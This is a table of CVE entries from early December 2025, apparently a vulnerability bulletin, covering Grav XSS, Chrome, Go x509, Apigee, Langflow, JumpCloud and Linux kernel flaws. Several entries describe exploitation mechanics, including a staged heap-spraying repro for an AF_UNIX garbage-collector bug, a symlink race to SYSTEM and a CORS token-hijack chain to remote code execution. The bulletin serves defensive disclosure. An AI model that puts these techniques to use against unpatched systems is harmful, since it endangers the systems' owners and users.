| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the /admin/pages/[page] endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the data[header][template] parameter. The script is saved within the page's frontmatter and executed automatically whenever the affected content is rendered in the administrative interface or frontend view. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | not yet calculated | CVE-2025-66310 | https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the /admin/pages/[page] endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the data[header][metadata], data[header][taxonomy][category], and data[header][taxonomy][tag] parameters. These scripts are stored in the page frontmatter and executed automatically whenever the affected page is accessed or rendered in the administrative interface. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | not yet calculated | CVE-2025-66311 | https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
| getgrav--grav | This admin plugin for Grav is an HTML user interface that provides a convenient way to configure Grav and easily create and modify pages. Prior to 1.11.0-beta.1, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the /admin/accounts/groups/Grupo endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the data[readableName] parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk. This vulnerability is fixed in 1.11.0-beta.1. | 2025-12-01 | not yet calculated | CVE-2025-66312 | https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988 https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0 |
| Go standard library--crypto/x509 | An excluded subdomain constraint in a certificate chain does not restrict the usage of wildcard SANs in the leaf certificate. For example a constraint that excludes the subdomain test.example.com does not prevent a leaf certificate from claiming the SAN *.example.com. | 2025-12-03 | not yet calculated | CVE-2025-61727 | https://go.dev/cl/723900 https://go.dev/issue/76442 https://groups.google.com/g/golang-announce/c/8FJoBkPddm4 https://pkg.go.dev/vuln/GO-2025-4175 |
| Go standard library--crypto/x509 | Within HostnameError.Error(), when constructing an error string, there is no limit to the number of hosts that will be printed out. Furthermore, the error string is constructed by repeated string concatenation, leading to quadratic runtime. Therefore, a certificate provided by a malicious actor can result in excessive resource consumption. | 2025-12-02 | not yet calculated | CVE-2025-61729 | https://go.dev/cl/725920 https://go.dev/issue/76445 https://groups.google.com/g/golang-announce/c/8FJoBkPddm4 https://pkg.go.dev/vuln/GO-2025-4155 |
| Google Cloud--Apigee hybrid Javacallout policy | A vulnerability exists in Google Apigee's JavaCallout policy https://docs.apigee.com/api-platform/reference/policies/java-callout-policy that allows for remote code execution. It is possible for a user to write a JavaCallout that injected a malicious object into the MessageContext to execute arbitrary Java code and system commands at runtime, leading to unauthorized access to data, lateral movement within the network, and access to backend systems. The Apigee hybrid versions below have all been updated to protect from this vulnerability: * Hybrid_1.11.2+ * Hybrid_1.12.4+ * Hybrid_1.13.3+ * Hybrid_1.14.1+ * OPDK_5202+ * OPDK_5300+ | 2025-12-05 | not yet calculated | CVE-2025-13426 | https://docs.cloud.google.com/apigee/docs/hybrid/release-notes#March_01_2025 |
| Google Cloud--Apigee-X | A vulnerability in Apigee-X allowed an attacker to gain unauthorized read and write access to Apigee Analytics (AX) data and access logs belonging to other Apigee customer organizations. Apigee-X was found to be vulnerable. This vulnerability was patched in version 1-16-0-apigee-3. No user action is required for this. | 2025-12-06 | not yet calculated | CVE-2025-13292 | https://docs.cloud.google.com/apigee/docs/release-notes#October_16_2025 |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-12-02 | not yet calculated | CVE-2025-13630 | |
| Google--Chrome | Inappropriate implementation in Google Updater in Google Chrome on Mac prior to 143.0.7499.41 allowed a remote attacker to perform privilege escalation via a crafted file. (Chromium security severity: High) | 2025-12-02 | not yet calculated | ||
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 143.0.7499.41 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. (Chromium security severity: High) | 2025-12-02 | not yet calculated | CVE-2025-13632 | |
| Google--Chrome | Use after free in Digital Credentials in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2025-12-02 | not yet calculated | CVE-2025-13633 | |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome on Windows prior to 143.0.7499.41 allowed a local attacker to bypass mark of the web via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-02 | not yet calculated | CVE-2025-13634 | |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome prior to 143.0.7499.41 allowed a local attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13635 | |
| Google--Chrome | Inappropriate implementation in Split View in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted domain name. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13636 | |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who convinced a user to engage in specific UI gestures to bypass download protections via a crafted HTML page. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13637 | |
| Google--Chrome | Use after free in Media Stream in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13638 | |
| Google--Chrome | Inappropriate implementation in WebRTC in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13639 | |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome prior to 143.0.7499.41 allowed a local attacker to bypass authentication via physical access to the device. (Chromium security severity: Low) | 2025-12-02 | not yet calculated | CVE-2025-13640 | |
| Google--Chrome | Bad cast in Loader in Google Chrome prior to 143.0.7499.41 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-02 | not yet calculated | CVE-2025-13720 | |
| Google--Chrome | Race in v8 in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-02 | not yet calculated | CVE-2025-13721 | |
| Google--Chrome | Side-channel information leakage in Navigation and Loading in Google Chrome prior to 139.0.7258.66 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2025-12-03 | not yet calculated | CVE-2025-13992 | |
| Horde--Groupware | Horde Groupware v5.2.22 has a user enumeration vulnerability that allows an unauthenticated attacker to determine the existence of valid accounts on the system. To exploit the vulnerability, an HTTP request must be sent to '/imp/attachment.php' including the parameters 'id' and 'u'. If the specified user exists, the server will return the download of an empty file; if it does not exist, no download will be initiated, which unequivocally reveals the validity of the user. | 2025-12-02 | not yet calculated | CVE-2025-41066 | https://www.incibe.es/en/incibe-cert/notices/aviso/disclosure-sensitive-information-horde-groupware |
| HP Inc--HP Image Assistant | A potential security vulnerability has been identified in HP Image Assistant for versions prior to 5.3.3. The vulnerability could potentially allow a local attacker to escalate privileges via a race condition when installing packages. | 2025-12-03 | not yet calculated | CVE-2025-13492 | https://support.hp.com/us-en/document/ish_13505078-13505143-16/hpsbgn04078 |
| IDI Eikon--Governalia | Reflected Cross-Site Scripting (XSS) in IDI Eikon's Governalia. The vulnerability allows an attacker to execute JavaScript code in the victim's browser when a malicious URL with the 'q' parameter in '/search' is sent to them. This vulnerability can be exploited to steal sensitive information such as session cookies or to perform actions on behalf of the victim. | 2025-12-02 | not yet calculated | CVE-2025-40700 | https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-governalia-idi-eikon https://governalia.es/ |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to trigger reads of stale data that can lead to kernel exceptions and write use-after-free. The Use After Free common weakness enumeration was chosen as the stale data can include handles to resources in which the reference counts can become unbalanced. This can lead to the premature destruction of a resource while in use. | 2025-12-01 | not yet calculated | CVE-2025-58408 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| IndigoSTAR Software--perl2exe | perl2exe <= V30.10C contains an arbitrary code execution vulnerability that allows local authenticated attackers to execute malicious scripts. Attackers can control the 0th argument of packed executables to execute another executable, allowing them to bypass restrictions and gain unauthorized access. | 2025-12-04 | not yet calculated | CVE-2024-58278 | ExploitDB-51825 IndigoSTAR Software Homepage IndigoSTAR Software Download Page https://www.vulncheck.com/advisories/indigostar-software-perl2exe-v3010c-arbitrary-code-execution |
| Industrial Video & Control--Longwatch | A vulnerability in Longwatch devices allows unauthenticated HTTP GET requests to execute arbitrary code via an exposed endpoint, due to the absence of code signing and execution controls. Exploitation results in SYSTEM-level privileges. | 2025-12-02 | not yet calculated | CVE-2025-13658 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-336-01 |
| Iskra--iHUB and iHUB Lite | The Iskra iHUB and iHUB Lite smart metering gateway exposes its web management interface without requiring authentication, allowing unauthenticated users to access and modify critical device settings. | 2025-12-02 | not yet calculated | CVE-2025-13510 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-336-02 |
| jpylypiw--Easywall | Easywall 0.3.1 allows authenticated remote command execution via a command injection vulnerability in the /ports-save endpoint that suffers from a parameter injection flaw. Attackers can inject shell metacharacters to execute arbitrary commands on the server. | 2025-12-04 | not yet calculated | CVE-2024-58275 | ExploitDB-51856 Easywall Homepage Easywall GitHub Repository https://www.vulncheck.com/advisories/easywall-031-authentication-bypass-via-command-injection-in-ports-save-endpoint |
| JumpCloud Inc.--Remote Assist | JumpCloud Remote Assist for Windows versions prior to 0.317.0 include an uninstaller that is invoked by the JumpCloud Windows Agent as NT AUTHORITY\SYSTEM during agent uninstall or update operations. The Remote Assist uninstaller performs privileged create, write, execute, and delete actions on predictable files inside a user-writable %TEMP% subdirectory without validating that the directory is trusted or resetting its ACLs when it already exists. A local, low-privileged attacker can pre-create the directory with weak permissions and leverage mount-point or symbolic-link redirection to (a) coerce arbitrary file writes to protected locations, leading to denial of service (e.g., by overwriting sensitive system files), or (b) win a race to redirect DeleteFileW() to attacker-chosen targets, enabling arbitrary file or folder deletion and local privilege escalation to SYSTEM. This issue is fixed in JumpCloud Remote Assist 0.317.0 and affects Windows systems where Remote Assist is installed and managed through the Agent lifecycle. | 2025-12-02 | not yet calculated | CVE-2025-34352 | https://jumpcloud.com/platform/remote-assistance https://jumpcloud.com/support/list-of-jumpcloud-agent-release-notes https://www.vulncheck.com/advisories/jumpcloud-remote-assist-arbitrary-file-write-delete-via-insecure-temp-directory |
| jumpserver--jumpserver | JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to v3.10.19 and v4.10.5, The /core/i18n// endpoint uses the Referer header as the redirection target without proper validation, which could lead to an Open Redirect vulnerability. This vulnerability is fixed in v3.10.19 and v4.10.5. | 2025-12-01 | not yet calculated | CVE-2025-58044 | https://github.com/jumpserver/jumpserver/security/advisories/GHSA-h762-mj7p-jwjq https://github.com/jumpserver/jumpserver/commit/36ae076cb021f16d2053a63651bc16d15a3ed53b |
| Langflow--Langflow | Langflow versions up to and including 1.6.9 contain a chained vulnerability that enables account takeover and remote code execution. An overly permissive CORS configuration (allow_origins='*' with allow_credentials=True) combined with a refresh token cookie configured as SameSite=None allows a malicious webpage to perform cross-origin requests that include credentials and successfully call the refresh endpoint. An attacker-controlled origin can therefore obtain fresh access_token / refresh_token pairs for a victim session. Obtained tokens permit access to authenticated endpoints - including built-in code-execution functionality - allowing the attacker to execute arbitrary code and achieve full system compromise. | 2025-12-05 | not yet calculated | CVE-2025-34291 | https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform https://github.com/langflow-ai/langflow https://www.vulncheck.com/advisories/langflow-cors-misconfiguration-to-token-hijack-and-rce |
| laradashboard--laradashboard | LaraDashboard is an all-In-one solution to start a Laravel Application. In 2.3.0 and earlier, the password reset flow trusts the Host header, allowing attackers to redirect the administrator's reset token to an attacker-controlled server. This can be combined with the module installation process to automatically execute the ServiceProvider::boot() method, enabling arbitrary PHP code execution. | 2025-12-04 | not yet calculated | CVE-2025-66509 | https://github.com/laradashboard/laradashboard/security/advisories/GHSA-j9mm-c9cj-pc82 https://github.com/laradashboard/laradashboard/commit/cc42f9cdf8e59bce794ee2d812a9709b1e6efa87 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Initialise scc_index in unix_add_edge(). Quang Le reported that the AF_UNIX GC could garbage-collect a receive queue of an alive in-flight socket, with a nice repro. The repro consists of three stages. 1) 1-a. Create a single cyclic reference with many sockets 1-b. close() all sockets 1-c. Trigger GC 2) 2-a. Pass sk-A to an embryo sk-B 2-b. Pass sk-X to sk-X 2-c. Trigger GC 3) 3-a. accept() the embryo sk-B 3-b. Pass sk-B to sk-C 3-c. close() the in-flight sk-A 3-d. Trigger GC As of 2-c, sk-A and sk-X are linked to unix_unvisited_vertices, and unix_walk_scc() groups them into two different SCCs: unix_sk(sk-A)->vertex->scc_index = 2 (UNIX_VERTEX_INDEX_START) unix_sk(sk-X)->vertex->scc_index = 3 Once GC completes, unix_graph_grouped is set to true. Also, unix_graph_maybe_cyclic is set to true due to sk-X's cyclic self-reference, which makes close() trigger GC. At 3-b, unix_add_edge() allocates unix_sk(sk-B)->vertex and links it to unix_unvisited_vertices. unix_update_graph() is called at 3-a. and 3-b., but neither unix_graph_grouped nor unix_graph_maybe_cyclic is changed because both sk-B's listener and sk-C are not in-flight. 3-c decrements sk-A's file refcnt to 1. Since unix_graph_grouped is true at 3-d, unix_walk_scc_fast() is finally called and iterates 3 sockets sk-A, sk-B, and sk-X: sk-A -> sk-B (-> sk-C) sk-X -> sk-X This is totally fine. All of them are not yet close()d and should be grouped into different SCCs. However, unix_vertex_dead() misjudges that sk-A and sk-B are in the same SCC and sk-A is dead. unix_sk(sk-A)->scc_index == unix_sk(sk-B)->scc_index <-- Wrong! && sk-A's file refcnt == unix_sk(sk-A)->vertex->out_degree ^-- 1 in-flight count for sk-B -> sk-A is dead !? The problem is that unix_add_edge() does not initialise scc_index. Stage 1) is used for heap spraying, making a newly allocated vertex have vertex->scc_index == 2 (UNIX_VERTEX_INDEX_START) set by unix_walk_scc() at 1-c. Let's track the max SCC index from the previous unix_walk_scc() call and assign the max + 1 to a new vertex's scc_index. This way, we can continue to avoid Tarjan's algorithm while preventing misjudgments. | 2025-12-04 | not yet calculated | CVE-2025-40214 | https://git.kernel.org/stable/c/20003fbb9174121b27bd1da6ebe61542ac4c327d https://git.kernel.org/stable/c/4cd8d755c7d4f515dd9abf483316aca2f1b7b0f3 https://git.kernel.org/stable/c/db81ad20fd8aef7cc7d536c52ee5ea4c1f979128 https://git.kernel.org/stable/c/1aa7e40ee850c9053e769957ce6541173891204d https://git.kernel.org/stable/c/60e6489f8e3b086bd1130ad4450a2c112e863791 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xfrm: delete x->tunnel as we delete x The ipcomp fallback tunnels currently get deleted (from the various lists and hashtables) as the last user state that needed that fallback is destroyed (not deleted). If a reference to that user state still exists, the fallback state will remain on the hashtables/lists, triggering the WARN in xfrm_state_fini. Because of those remaining references, the fix in commit f75a2804da39 ("xfrm: destroy xfrm_state synchronously on net exit path") is not complete. We recently fixed one such situation in TCP due to defered freeing of skbs (commit 9b6412e6979f ("tcp: drop secpath at the same time as we currently drop dst")). This can also happen due to IP reassembly: skbs with a secpath remain on the reassembly queue until netns destruction. If we can't guarantee that the queues are flushed by the time xfrm_state_fini runs, there may still be references to a (user) xfrm_state, preventing the timely deletion of the corresponding fallback state. Instead of chasing each instance of skbs holding a secpath one by one, this patch fixes the issue directly within xfrm, by deleting the fallback state as soon as the last user state depending on it has been deleted. Destruction will still happen when the final reference is dropped. A separate lockdep class for the fallback state is required since we're going to lock x->tunnel while x is locked. | 2025-12-04 | not yet calculated | CVE-2025-40215 | https://git.kernel.org/stable/c/b441cf3f8c4b8576639d20c8eb4aa32917602ecd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/rsrc: don't rely on user vaddr alignment There is no guaranteed alignment for user pointers, however the calculation of an offset of the first page into a folio after coalescing uses some weird bit mask logic, get rid of it. | 2025-12-04 | not yet calculated | CVE-2025-40216 | https://git.kernel.org/stable/c/50998b0ae7d9d552e96d8b7239981cf05f65eff5 https://git.kernel.org/stable/c/f16769241594be59387b56ab525e327f54377e60 https://git.kernel.org/stable/c/3a3c6d61577dbb23c09df3e21f6f9eda1ecd634b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pidfs: validate extensible ioctls Validate extensible ioctls stricter than we do now. | 2025-12-04 | not yet calculated | CVE-2025-40217 | https://git.kernel.org/stable/c/bf0fbf5e8b0aff8a4a0fb35e32b10083baa83c04 https://git.kernel.org/stable/c/3c17001b21b9f168c957ced9384abe969019b609 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/vaddr: do not repeat pte_offset_map_lock() until success DAMON's virtual address space operation set implementation (vaddr) calls pte_offset_map_lock() inside the page table walk callback function. This is for reading and writing page table accessed bits. If pte_offset_map_lock() fails, it retries by returning the page table walk callback function with ACTION_AGAIN. pte_offset_map_lock() can continuously fail if the target is a pmd migration entry, though. Hence it could cause an infinite page table walk if the migration cannot be done until the page table walk is finished. This indeed caused a soft lockup when CPU hotplugging and DAMON were running in parallel. Avoid the infinite loop by simply not retrying the page table walk. DAMON is promising only a best-effort accuracy, so missing access to such pages is no problem. | 2025-12-04 | not yet calculated | CVE-2025-40218 | https://git.kernel.org/stable/c/677ebfe5d00f94adec0c0204f6e6e2a82d3f77bf https://git.kernel.org/stable/c/ac42320ec873bfe726141069cfdd90ee5bc4e885 https://git.kernel.org/stable/c/0ccd91cf749536d41307a07e60ec14ab0dbf21f5 https://git.kernel.org/stable/c/b93af2cc8e036754c0d9970d9ddc47f43cc94b9f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/IOV: Add PCI rescan-remove locking when enabling/disabling SR-IOV Before disabling SR-IOV via config space accesses to the parent PF, sriov_disable() first removes the PCI devices representing the VFs. Since commit 9d16947b7583 ("PCI: Add global pci_lock_rescan_remove()") such removal operations are serialized against concurrent remove and rescan using the pci_rescan_remove_lock. No such locking was ever added in sriov_disable() however. In particular when commit 18f9e9d150fc ("PCI/IOV: Factor out sriov_add_vfs()") factored out the PCI device removal into sriov_del_vfs() there was still no locking around the pci_iov_remove_virtfn() calls. On s390 the lack of serialization in sriov_disable() may cause double remove and list corruption with the below (amended) trace being observed: PSW: 0704c00180000000 0000000c914e4b38 (klist_put+56) GPRS: 000003800313fb48 0000000000000000 0000000100000001 0000000000000001 00000000f9b520a8 0000000000000000 0000000000002fbd 00000000f4cc9480 0000000000000001 0000000000000000 0000000000000000 0000000180692828 00000000818e8000 000003800313fe2c 000003800313fb20 000003800313fad8 #0 [3800313fb20] device_del at c9158ad5c #1 [3800313fb88] pci_remove_bus_device at c915105ba #2 [3800313fbd0] pci_iov_remove_virtfn at c9152f198 #3 [3800313fc28] zpci_iov_remove_virtfn at c90fb67c0 #4 [3800313fc60] zpci_bus_remove_device at c90fb6104 #5 [3800313fca0] __zpci_event_availability at c90fb3dca #6 [3800313fd08] chsc_process_sei_nt0 at c918fe4a2 #7 [3800313fd60] crw_collect_info at c91905822 #8 [3800313fe10] kthread at c90feb390 #9 [3800313fe68] __ret_from_fork at c90f6aa64 #10 [3800313fe98] ret_from_fork at c9194f3f2. This is because in addition to sriov_disable() removing the VFs, the platform also generates hot-unplug events for the VFs. This being the reverse operation to the hotplug events generated by sriov_enable() and handled via pdev->no_vf_scan. And while the event processing takes pci_rescan_remove_lock and checks whether the struct pci_dev still exists, the lack of synchronization makes this checking racy. Other races may also be possible of course though given that this lack of locking persisted so long observable races seem very rare. Even on s390 the list corruption was only observed with certain devices since the platform events are only triggered by config accesses after the removal, so as long as the removal finished synchronously they would not race. Either way the locking is missing so fix this by adding it to the sriov_del_vfs() helper. Just like PCI rescan-remove, locking is also missing in sriov_add_vfs() including for the error case where pci_stop_and_remove_bus_device() is called without the PCI rescan-remove lock being held. Even in the non-error case, adding new PCI devices and buses should be serialized via the PCI rescan-remove lock. Add the necessary locking. | 2025-12-04 | not yet calculated | CVE-2025-40219 | https://git.kernel.org/stable/c/5c1cd7d405e94dc6cb320cc0cc092b74895b6ddf https://git.kernel.org/stable/c/1e8a80290f964bdbad225221c8a1594c7e01c8fd https://git.kernel.org/stable/c/a645ca21de09e3137cbb224fa6c23cca873a1d01 https://git.kernel.org/stable/c/a24219172456f035d886857e265ca24c85b167c8 https://git.kernel.org/stable/c/36039348bca77828bf06eae41b8f76e38cd15847 https://git.kernel.org/stable/c/53154cd40ccf285f1d1c24367824082061d155bd https://git.kernel.org/stable/c/ee40e5db052d7c6f406fdb95ad639c894c74674c https://git.kernel.org/stable/c/05703271c3cdcc0f2a8cf6ebdc45892b8ca83520 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fuse: fix livelock in synchronous file put from fuseblk workers I observed a hang when running generic/323 against a fuseblk server. This test opens a file, initiates a lot of AIO writes to that file descriptor, and closes the file descriptor before the writes complete. Unsurprisingly, the AIO exerciser threads are mostly stuck waiting for responses from the fuseblk server: # cat /proc/372265/task/372313/stack [<0>] request_wait_answer+0x1fe/0x2a0 [fuse] [<0>] __fuse_simple_request+0xd3/0x2b0 [fuse] [<0>] fuse_do_getattr+0xfc/0x1f0 [fuse] [<0>] fuse_file_read_iter+0xbe/0x1c0 [fuse] [<0>] aio_read+0x130/0x1e0 [<0>] io_submit_one+0x542/0x860 [<0>] __x64_sys_io_submit+0x98/0x1a0 [<0>] do_syscall_64+0x37/0xf0 [<0>] entry_SYSCALL_64_after_hwframe+0x4b/0x53 But the /weird/ part is that the fuseblk server threads are waiting for responses from itself: # cat /proc/372210/task/372232/stack [<0>] request_wait_answer+0x1fe/0x2a0 [fuse] [<0>] __fuse_simple_request+0xd3/0x2b0 [fuse] [<0>] fuse_file_put+0x9a/0xd0 [fuse] [<0>] fuse_release+0x36/0x50 [fuse] [<0>] __fput+0xec/0x2b0 [<0>] task_work_run+0x55/0x90 [<0>] syscall_exit_to_user_mode+0xe9/0x100 [<0>] do_syscall_64+0x43/0xf0 [<0>] entry_SYSCALL_64_after_hwframe+0x4b/0x53 The fuseblk server is fuse2fs so there's nothing all that exciting in the server itself. So why is the fuse server calling fuse_file_put? The commit message for the fstest sheds some light on that: "By closing the file descriptor before calling io_destroy, you pretty much guarantee that the last put on the ioctx will be done in interrupt context (during I/O completion). Aha. AIO fgets a new struct file from the fd when it queues the ioctx. The completion of the FUSE_WRITE command from userspace causes the fuse server to call the AIO completion function. The completion puts the struct file, queuing a delayed fput to the fuse server task. When the fuse server task returns to userspace, it has to run the delayed fput, which in the case of a fuseblk server, it does synchronously. Sending the FUSE_RELEASE command sychronously from fuse server threads is a bad idea because a client program can initiate enough simultaneous AIOs such that all the fuse server threads end up in delayed_fput, and now there aren't any threads left to handle the queued fuse commands. Fix this by only using asynchronous fputs when closing files, and leave a comment explaining why. | 2025-12-04 | not yet calculated | CVE-2025-40220 | https://git.kernel.org/stable/c/548e1f2bac1d4df91a6138f26bb4ab00323fd948 https://git.kernel.org/stable/c/cfd1aa3e2b71f3327cb373c45a897c9028c62b35 https://git.kernel.org/stable/c/83b375c6efef69b1066ad2d79601221e7892745a https://git.kernel.org/stable/c/bfd17b6138df0122a95989457d8e18ce0b86165e https://git.kernel.org/stable/c/b26923512dbe57ae4917bafd31396d22a9d1691a https://git.kernel.org/stable/c/f19a1390af448d9e193c08e28ea5f727bf3c3049 https://git.kernel.org/stable/c/26e5c67deb2e1f42a951f022fdf5b9f7eb747b01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: pci: mg4b: fix uninitialized iio scan data Fix potential leak of uninitialized stack data to userspace by ensuring that the `scan` structure is zeroed before use. | 2025-12-04 | not yet calculated | CVE-2025-40221 | https://git.kernel.org/stable/c/b7f82da7f86479cb6479a76ebe213ece7c77398f https://git.kernel.org/stable/c/b792eba44494b4e6ab5006013335f9819f303b8b https://git.kernel.org/stable/c/c0d3f6969bb4d72476cfe7ea9263831f1c283704 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tty: serial: sh-sci: fix RSCI FIFO overrun handling The receive error handling code is shared between RSCI and all other SCIF port types, but the RSCI overrun_reg is specified as a memory offset, while for other SCIF types it is an enum value used to index into the sci_port_params->regs array, as mentioned above the sci_serial_in() function. For RSCI, the overrun_reg is CSR (0x48), causing the sci_getreg() call inside the sci_handle_fifo_overrun() function to index outside the bounds of the regs array, which currently has a size of 20, as specified by SCI_NR_REGS. Because of this, we end up accessing memory outside of RSCI's rsci_port_params structure, which, when interpreted as a plat_sci_reg, happens to have a non-zero size, causing the following WARN when sci_serial_in() is called, as the accidental size does not match the supported register sizes. The existence of the overrun_reg needs to be checked because SCIx_SH3_SCIF_REGTYPE has overrun_reg set to SCLSR, but SCLSR is not present in the regs array. Avoid calling sci_getreg() for port types which don't use standard register handling. Use the ops->read_reg() and ops->write_reg() functions to properly read and write registers for RSCI, and change the type of the status variable to accommodate the 32-bit CSR register. sci_getreg() and sci_serial_in() are also called with overrun_reg in the sci_mpxed_interrupt() interrupt handler, but that code path is not used for RSCI, as it does not have a muxed interrupt. ------------[ cut here ]------------ Invalid register access WARNING: CPU: 0 PID: 0 at drivers/tty/serial/sh-sci.c:522 sci_serial_in+0x38/0xac Modules linked in: renesas_usbhs at24 rzt2h_adc industrialio_adc sha256 cfg80211 bluetooth ecdh_generic ecc rfkill fuse drm backlight ipv6 CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.17.0-rc1+ #30 PREEMPT Hardware name: Renesas RZ/T2H EVK Board based on r9a09g077m44 (DT) pstate: 604000c5 (nZCv daIF +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : sci_serial_in+0x38/0xac lr : sci_serial_in+0x38/0xac sp : ffff800080003e80 x29: ffff800080003e80 x28: ffff800082195b80 x27: 000000000000000d x26: ffff8000821956d0 x25: 0000000000000000 x24: ffff800082195b80 x23: ffff000180e0d800 x22: 0000000000000010 x21: 0000000000000000 x20: 0000000000000010 x19: ffff000180e72000 x18: 000000000000000a x17: ffff8002bcee7000 x16: ffff800080000000 x15: 0720072007200720 x14: 0720072007200720 x13: 0720072007200720 x12: 0720072007200720 x11: 0000000000000058 x10: 0000000000000018 x9 : ffff8000821a6a48 x8 : 0000000000057fa8 x7 : 0000000000000406 x6 : ffff8000821fea48 x5 : ffff00033ef88408 x4 : ffff8002bcee7000 x3 : ffff800082195b80 x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff800082195b80 Call trace: sci_serial_in+0x38/0xac (P) sci_handle_fifo_overrun.isra.0+0x70/0x134 sci_er_interrupt+0x50/0x39c __handle_irq_event_percpu+0x48/0x140 handle_irq_event+0x44/0xb0 handle_fasteoi_irq+0xf4/0x1a0 handle_irq_desc+0x34/0x58 generic_handle_domain_irq+0x1c/0x28 gic_handle_irq+0x4c/0x140 call_on_irq_stack+0x30/0x48 do_interrupt_handler+0x80/0x84 el1_interrupt+0x34/0x68 el1h_64_irq_handler+0x18/0x24 el1h_64_irq+0x6c/0x70 default_idle_call+0x28/0x58 (P) do_idle+0x1f8/0x250 cpu_startup_entry+0x34/0x3c rest_init+0xd8/0xe0 console_on_rootfs+0x0/0x6c __primary_switched+0x88/0x90 ---[ end trace 0000000000000000 ]--- | 2025-12-04 | not yet calculated | CVE-2025-40222 | https://git.kernel.org/stable/c/2ec9bbd09a6cdf5b8c726be34f29630faf585d07 https://git.kernel.org/stable/c/ef8fef45c74b5a0059488fda2df65fa133f7d7d0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: most: usb: Fix use-after-free in hdm_disconnect hdm_disconnect() calls most_deregister_interface(), which eventually unregisters the MOST interface device with device_unregister(iface->dev). If that drops the last reference, the device core may call release_mdev() immediately while hdm_disconnect() is still executing. The old code also freed several mdev-owned allocations in hdm_disconnect() and then performed additional put_device() calls. Depending on refcount order, this could lead to use-after-free or double-free when release_mdev() ran (or when unregister paths also performed puts). Fix by moving the frees of mdev-owned allocations into release_mdev(), so they happen exactly once when the device is truly released, and by dropping the extra put_device() calls in hdm_disconnect() that are redundant after device_unregister() and most_deregister_interface(). This addresses the KASAN slab-use-after-free reported by syzbot in hdm_disconnect(). See report and stack traces in the bug link below. | 2025-12-04 | not yet calculated | CVE-2025-40223 | https://git.kernel.org/stable/c/5b5c478f09b1b35e7fe6fc9a1786c9bf6030e831 https://git.kernel.org/stable/c/578eb18cd111addec94c43f61cd4b4429e454809 https://git.kernel.org/stable/c/33daf469f5294b9d07c4fc98216cace9f4f34cc6 https://git.kernel.org/stable/c/72427dc6f87523995f4e6ae35a948bb2992cabce 